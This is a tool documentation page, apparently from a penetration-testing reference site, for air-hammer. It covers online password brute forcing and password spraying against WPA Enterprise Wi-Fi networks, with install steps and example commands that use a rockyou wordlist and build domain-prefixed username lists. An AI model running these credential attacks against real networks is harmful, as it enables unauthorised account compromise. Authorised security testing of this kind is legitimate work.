Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

air-hammer performs online brute force and password spraying against WPA Enterprise networks. It requires a known username (with domain prefix) and tests passwords one by one against the live AP. Used when a valid domain username is already known (from EAP identity capture or other recon) and the goal is to recover their password.

Install

git clone https://github.com/Wh1t3Rh1n0/air-hammer.git
cd air-hammer
pip3 install -r requirements.txt

Usage

./air-hammer.py [options]

Common Flags

FlagDescription
-i <iface>Wireless interface (managed mode)
-e <SSID>Target network SSID
-u <file>Username file (one per line, with domain)
-p <file>Password wordlist
-P <password>Single password (for spray)

Brute Force Known Username

echo 'DOMAIN\username' > target.user
./air-hammer.py -i wlan1 -e <SSID> -p ~/rockyou-top100000.txt -u target.user

Password Spray

Test one password across many usernames, useful to avoid lockouts: 
# Prepend domain to each username
cat ~/usernames.txt | awk '{print "DOMAIN\\" $1}' > ~/domain-users.txt

./air-hammer.py -i wlan1 -e <SSID> -P <PASSWORD> -u ~/domain-users.txt